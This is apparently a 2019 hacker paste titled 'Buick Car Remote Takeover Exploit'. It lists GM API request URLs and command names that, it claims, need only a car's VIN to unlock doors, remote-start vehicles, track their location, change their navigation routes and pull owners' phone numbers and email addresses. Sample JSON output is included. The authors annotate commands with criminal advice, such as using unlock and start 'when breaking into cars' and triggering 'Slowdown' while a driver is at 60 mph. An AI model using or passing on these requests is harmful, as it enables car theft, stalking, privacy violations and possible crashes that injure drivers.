Buick Car Remote Takeover Exploit - 22/09/2019

1. [Discovered By: SmallDoink#0666]
2. [Discovered By: FuckBinary]
3. [Discovered By: ScaredKYS]
4. myBuick Exploit - 22/09/2019
5. --
6. Affected Vehicles]
7. Buick (2017-2020 Models)
8. Cadillac (2017-2020 Models)
9. Chevrolet (2019-2020 Models)
10. GMC (2019-2020 Models)
11. --
12. Start]
13. The myBuick app has the ability to:
14. - Alert vehicles (Alarm)
15. - Stop Charging the Car
16. - View Data Usage (Car Hotspot)
17. - View Car Information (Mileage, PSI, Gas Level, Gas Used, Trips, Call Status)
18. - Lock Car Doors/Unlock Car Doors
19. - Change Car Route
20. - Start/Shut Off the Car
21. - Grab the Car Location
22. With the cars VIN (Vehicle Identification Number), you can do all of the above to the target car. Meaning if you go into a parking lot, grab a Buick's Model # and it's VIN, you could unlock the doors from your phone.
23. -
24. Why has nobody tried this?]
25. The reason nobody has tried to exploit this ability before is because you need a registered myBuick account. Which until recently, are available to make without purchasing a GM car. This feature allows ease to the consumers life, but at what cost? "Hackers" have the ability to grab information on your car and even lock or unlock the doors. Going to the beach? I don't think so. With this exploit, I can change the route your car is traveling without even alerting you, so instead of the beach, you're going to the strip club.
26. -
27. Code]
28. No code is needed to exploit this function, just make a request:
29. https://api.gm.com/api/v1/account/vehicles/CARVIN/commands/commandgoeshere
30. Available Commands:]
31. unlockDoor
32. alert
33. cancelAlert
34. cancelStart
35. telemetryOptIn
36. telemetryOptOut
37. start
38. cancelStart
39. diagnostics
40. sendTBTRoute
41. location
42. sendNavDestination (/CARVIN/navUnit/commands/)
43. disable (/CARVIN/hotspot/commands/)
44. enable (/CARVIN/hotspot/commands/)
45. getHotspotInfo (/CARVIN/hotspot/commands/)
46. getHotspotStatus (/CARVIN/hotspot/commands/)
47. setHotspotInfo (/CARVIN/hotspot/commands/)
48. Want Owner Info on any Buick Car?]
49. Just send a request here
50. https://api.gm.com/api/v1/account/vehicles/CARVINHERE
51. It will return this
52. },
53. "features": {
54. "feature": [
55. "AntiLockBraking",
56. "TirePressure",
57. "BlueTooth",
58. "VirtualAdvisor",
59. "POIDownload",
60. "LockUnlock",
61. "RemoteStart", (Very good command | Use when breaking into cars)
62. "OnstarDestinationDownload",
63. "Slowdown", (Very good command | Turn on when driver is going 60MPH)
64. "TurnByTurn",
65. "unlockDoor", (Very good command | Use when breaking into cars)
66. "lockDoor", (Very good command | Use when breaking into cars)
67. "alert" (It's an alright command | Use at midnight)
68. ]
69. },
70. "make": "CAR MAKE",
71. "manufacturer": "General Motors",
72. "model": "MODEL",
73. "phone": "OWNER PHONE NUMBER",
74. "primaryDriverId": ACCOUNTID,
75. "primaryDriverURL": "https://api.gm.com/api/v1/account/subscribers/ACCOUNTID",
76. "propulsionType": "TYPE",
77. "unitType": "EMBEDDED",
78. "url": "https://api.gm.com/api/v1/account/vehicles/CARVINHERE",
79. "vehiclePrograms": {
80. "vehicleProgram": [
81. {
82. "isOptedIn": "true",
83. "name": "OnStar Vehicle Diagnostics",
84. "optedInEmailAddress": "OWNER EMAIL ADDRESS"
85. },
86. {
87. "isOptedIn": "false",
88. "name": "Dealer Maintenance Notification"
89. }
90. ]
91. },
92. "vin": "CARVINHERE",
93. "year": "YEAR CAR MADE"
94. }
95. }
96. Want the car's diagnostics?]
97. https://api.gm.com/api/v1/account/vehicles/CAR VIN GOES HERE/commands/diagnostics
98. {
99. "commandData": {
100. "supportedDiagnostics": {
101. "supportedDiagnostic": [
102. "LIFETIME FUEL USED",
103. "LIFETIME FUEL ECON",
104. "LAST TRIP DISTANCE",
105. "ODOMETER",
106. "LAST TRIP FUEL ECONOMY",
107. "TIRE PRESSURE",
108. "OIL LIFE",
109. "FUEL TANK INFO",
110. "VEHICLE RANGE"
111. ]
112. }
113. },
114. [Discovered By: SmallDoink#0666]
115. [Discovered By: FuckBinary]
116. [Discovered By: ScaredKYS]